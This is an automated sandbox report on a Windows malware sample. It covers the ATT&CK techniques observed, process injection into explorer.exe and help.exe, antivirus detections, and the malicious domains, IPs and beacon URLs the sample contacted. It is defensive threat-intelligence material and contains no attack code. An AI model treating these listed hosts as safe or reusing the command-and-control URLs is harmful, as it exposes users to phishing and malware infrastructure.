          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433074 Sample: 5t2CmTUhKc.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 29 www.t4mall.com 2->29 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 5 other signatures 2->51 10 5t2CmTUhKc.exe 20 2->10         started        signatures3 process4 file5 27 C:\Users\user\AppData\Local\...\System.dll, PE32 10->27 dropped 53 Detected unpacking (changes PE section rights) 10->53 55 Maps a DLL or memory area into another process 10->55 57 Tries to detect virtualization through RDTSC time measurements 10->57 14 5t2CmTUhKc.exe 10->14         started        signatures6 process7 signatures8 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 17 help.exe 14->17         started        20 explorer.exe 14->20 injected process9 dnsIp10 37 Modifies the context of a thread in another process (thread injection) 17->37 39 Maps a DLL or memory area into another process 17->39 41 Tries to detect virtualization through RDTSC time measurements 17->41 23 cmd.exe 1 17->23         started        31 purpleqube.com 119.81.95.146, 49751, 80 SOFTLAYERUS Singapore 20->31 33 www.xn---yado-8e4dze0c.site 150.95.255.38, 49753, 80 INTERQGMOInternetIncJP Japan 20->33 35 9 other IPs or domains 20->35 43 System process connects to network (likely due to code injection or exploit) 20->43 signatures11 process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5t2CmTUhKc.exe29%VirustotalBrowse
          5t2CmTUhKc.exe28%ReversingLabs
          5t2CmTUhKc.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nse5FEA.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.5t2CmTUhKc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.5t2CmTUhKc.exe.2290000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.5t2CmTUhKc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.help.exe.4ed3f8.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.0.5t2CmTUhKc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          0.2.5t2CmTUhKc.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          11.2.help.exe.35c7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          2.1.5t2CmTUhKc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFd100%Avira URL Cloudmalware
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd100%Avira URL Cloudphishing
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.oceancollaborative.com/bp3i/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ==0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz100%Avira URL Cloudphishing
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.xn---yado-8e4dze0c.site/bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFd0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.bancambios.network/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw==0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.t4mall.com
          		165.3.53.250
          		truefalse
            		unknown
            bancambios.network
            		185.224.138.83
            		truetrue
              		unknown
              purpleqube.com
              		119.81.95.146
              		truetrue
                		unknown
                www.xn---yado-8e4dze0c.site
                		150.95.255.38
                		truetrue
                  		unknown
                  www.thechandeck.com
                  		154.215.150.183
                  		truetrue
                    		unknown
                    middreampostal.com
                    		184.175.83.64
                    		truetrue
                      		unknown
                      oceancollaborative.com
                      		184.168.131.241
                      		truetrue
                        		unknown
                        www.middreampostal.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.purpleqube.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.oceancollaborative.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.bancambios.network
                              		unknown
                              		unknowntrue
                                		unknown
                                www.bluebeltpanobuy.com
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.thechandeck.com/bp3i/?o6tTHHhh=p3NsgK4BERuThhH+teqwS1C0txfpjFxawwSOzHNPnDrrCpY7gJP96rzPXZQ9m0/nBd8sZePfaw==&3fuD_=S2MtYLGX0vFdtrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFdtrue
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  www.oceancollaborative.com/bp3i/true
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.middreampostal.com/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=IptNrmuXUVaV/Z9910/N9dyZxtPI5jyScGKXmfxiWqbBXO2QZbfIAu6+lQXyF1DTVkAc6YCxuQ==true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xn---yado-8e4dze0c.site/bp3i/?o6tTHHhh=G/6vsm0KxG9qmRdgnTa4hWK9fX8ri3vqlPmeKNZjc+yTORxazFkMTyGVd6qzkwgGx7fuosCohA==&3fuD_=S2MtYLGX0vFdtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.bancambios.network/bp3i/?3fuD_=S2MtYLGX0vFd&o6tTHHhh=So2Tvg87hIziEtO/Cru7EIQwZdKNOPQNXuBCwKB1xQ7qfTi1ynPiyI53Zc3PyJmgTVsVUbeTjw==true
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.344027143.000000000095C000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csshelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.tiro.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorError5t2CmTUhKc.exefalse
                                                    		high
                                                    http://www.goodfont.co.krexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://afternic.com/forsale/oceancollaborative.com?utm_source=TDFS&utm_medium=sn_affiliate_click&uthelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.carterandcone.comlexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vzhelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmptrue
                                                      • Avira URL Cloud: phishing
                                                      		unknown
                                                      http://www.typography.netDexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://fontfabrik.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://nsis.sf.net/NSIS_Error5t2CmTUhKc.exefalse
                                                            		high
                                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.fonts.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.sandoll.co.krexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://dfltweb1.onamae.comhelp.exe, 0000000B.00000002.599307381.0000000003742000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.sakkal.comexplorer.exe, 00000005.00000000.366847919.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  184.175.83.64
                                                                  		middreampostal.comUnited States
                                                                  		7393CYBERCONUStrue
                                                                  185.224.138.83
                                                                  		bancambios.networkGermany
                                                                  		47583AS-HOSTINGERLTtrue
                                                                  119.81.95.146
                                                                  		purpleqube.comSingapore
                                                                  		36351SOFTLAYERUStrue
                                                                  184.168.131.241
                                                                  		oceancollaborative.comUnited States
                                                                  		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                  154.215.150.183
                                                                  		www.thechandeck.comSeychelles
                                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                                  150.95.255.38
                                                                  		www.xn---yado-8e4dze0c.siteJapan7506INTERQGMOInternetIncJPtrue

                                                                  General Information

                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                  Analysis ID:433074
                                                                  Start date:11.06.2021
                                                                  Start time:08:52:39
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 10m 10s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:5t2CmTUhKc.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:25
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:1
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@8/4@11/6
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 25.6% (good quality ratio 23.3%)
                                                                  • Quality average: 76.4%
                                                                  • Quality standard deviation: 30.6%
                                                                  HCA Information:
                                                                  • Successful, ratio: 90%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 52.255.188.83, 204.79.197.200, 13.107.21.200, 168.61.161.212, 92.122.145.220, 104.43.139.144, 20.50.102.62, 20.54.104.15, 20.54.26.129, 92.122.213.247, 92.122.213.194, 23.218.208.56, 20.82.210.154
                                                                  • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  185.224.138.83Updated April SOA.xlsxGet hashmaliciousBrowse
                                                                  • www.solocubiertos.com/hx3a/?BDH=h8HIR/JRNjzDsSWIWUzNg2gIEcYDeeAucgYL/MnDjD1L6VW+knLzJM/v5Dkqg23ga+J5Og==&SH6=u2JtglFH
                                                                  119.81.95.146a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                  • www.purpleqube.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLbpk+rZ/5L
                                                                  184.168.131.241DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                                  • www.thriveglucose.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6
                                                                  5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                  • www.centerstageacademyaz.com/hlx/?wVSH=B58lx/xaXAfqMrblDg0CPLD4IpEHx1MuvfXEetjmXTR5BJPCAvCKa/uMIPwGmDqbiG+v&i0D=adKPlr
                                                                  AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                  • www.centerstageacademyaz.com/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
                                                                  #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                  • www.mnanoramaonline.com/dp3a/?6l6x=JpPDbdpPqJah&F4ClVX_=HMSedmBm6/hIWbSmMxUxYZbRrtDTwFsk+TyYRjGVNzdErelZVoFwy82MvW0W4Pxo5ExE
                                                                  Payment receipt MT103.exeGet hashmaliciousBrowse
                                                                  • www.2006almadenrd.com/n86i/?3fDpH=EncZcG68c0UFvrfaep8p5kHr59rKeBqDHDmJoTlHDlH5Q19q6THcE1BV1jQP2/4tmveZ&Vjo=1bT0vz7
                                                                  New Order.exeGet hashmaliciousBrowse
                                                                  • www.flockuplabs.com/uqf5/?mVS=CH5D6h5PGn4ts&3fCDL=kpO7L1Lkp8iY+ON3mW6Oq8CK0aWMRalGagQzJa0PwjziroypQJ68geE/ArNV1zcwD6YY
                                                                  NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                                  • www.cohorsetrails.com/j7e/?iP_T-V=s4TxBF2&F8EdvhY=0uFKBmvmOY3N1cR6tfDjvpZ4XCwo5tCp3URJWx4vIEcYZHH/ZYklCf5hgzXfIPGP0WLm
                                                                  oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                                  • www.covid-19-411.com/c6ss/?P6AT72s=DB71Bym9Rr14TfwtieeaSq+XP6MPPP3k6OJ3eYsEhcCNhSwkByfhm8SfoYhSpsTVm4Za&j6A4qv=gJBt3
                                                                  qXDtb88hht.exeGet hashmaliciousBrowse
                                                                  • www.thriveglucose.com/p2io/?Z8E=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6&b0GDi6=Q6Ahtfox
                                                                  a8eC6O6okf.exeGet hashmaliciousBrowse
                                                                  • www.oceancollaborative.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOeXG6ZsHsCfG
                                                                  Telex_Payment.exeGet hashmaliciousBrowse
                                                                  • www.avaatraelegant.com/m3rc/?hTk8tpm=TSQTGbGl+UafldaDY7iOrPnVdHYt9Ypfw/QiU1mtcNJ1KwINQbFG4EVzsaDm0ZQusGTd&I4=5jxX5BaX4hy8-j8
                                                                  QyKNw7NioL.exeGet hashmaliciousBrowse
                                                                  • www.thriveglucose.com/p2io/?m4=PditjTvx4PwX_x-&aBd=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YuKFK/aPa09
                                                                  Payment_Advice.exeGet hashmaliciousBrowse
                                                                  • www.ingenious.care/uqf5/?9rw=IyvMBxqM8mznciPJtkomKlfF/kq/6zAZ/NulsdYJ5cntVs/S9fIvdvtMsAQ76USE273s&s6=bPYXfd3Xq0VHDp
                                                                  SOA #093732.exeGet hashmaliciousBrowse
                                                                  • www.xn--arepasantabrbara-pmb.com/hme1/?jPw=2SPw7LQlaa7cti3Mn2rz6TCjd7lU8jHnPITUh2R4n2dBA+x2SVgAgss/958kYo9ATjis&y2JhS=6lr41hZpgNXtF
                                                                  rHk5KU7bfT.exeGet hashmaliciousBrowse
                                                                  • www.rvvikings.com/dxe/?TfTl=jHjQ1sEHwNXw4n+A/8fpKnaO6SpchAkuZ+GgFHi7AN8kb2XA0i8OmoFepGcQzHHYqc9c&7nGt5=h6Altfix
                                                                  Order.exeGet hashmaliciousBrowse
                                                                  • www.complexscale.net/jogt/?w6ATB0=mM0Ck4zU/d9hG5lVEWeH7uQPwyvlCbjgstqvdurAh1ZdTH4Yqc2sgGmD0X7Q/SemRdxv&Jxox=Er6tXhMxl
                                                                  VubYcOdGjQ.exeGet hashmaliciousBrowse
                                                                  • www.theguyscave.com/k8n/?wR-T-=ETYdeRC&5jn=ffRSpgj0URUgPhDkzfA3YdlDQQz5pJJRybkyQxcySljT84fGDbAnWSnhJv/zp2N19SZb
                                                                  Payment_Advice.exeGet hashmaliciousBrowse
                                                                  • www.getthistle.com/q4kr/?w2MLb=6lux&QtRl=Jt1JO2t971959LrdDM/EJ1cvA97Pwm/HDqPg7v3P69I8XU+CUZlUHoU2RjaRLLQwrinB
                                                                  Neworder.exeGet hashmaliciousBrowse
                                                                  • www.kanitanaillounge.com/jogt/?PlQ8j=jKXq1ZQHcPBM/dFmsG96Rrq7SiC5kuIPSSiD8Dd2ip+Nb1yUpyUL4OnIzbOoJzgaBXqf&2db=g0G0iLxxPHIT
                                                                  Request for Price W912D2-19-Q-0004.exeGet hashmaliciousBrowse
                                                                  • www.blackwomencamp.net/egem/?2dCHQ=s0ILlWrMQzsGp3p1RmAY3qUukEAkmJAYYPkleJQvQBxBfoOdmLxTHansmvlw5WkCayf3&7nDtA=f2JDOtyx2xtDzteP

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  CYBERCONUSsample.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  tS9P6wPz9x.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  ransomware.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  ransomware.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  gc79a7rUNV.exeGet hashmaliciousBrowse
                                                                  • 184.175.106.113
                                                                  CONSTANTINE.xlsxGet hashmaliciousBrowse
                                                                  • 216.15.213.195
                                                                  08142020_1463075702.docGet hashmaliciousBrowse
                                                                  • 66.201.98.191
                                                                  http://srconsultingsrv.com/wp-admin/open-9c-pqmgpgy9fo4mnwz/verifiable-area/10bpikjgd-32105y0ut8/Get hashmaliciousBrowse
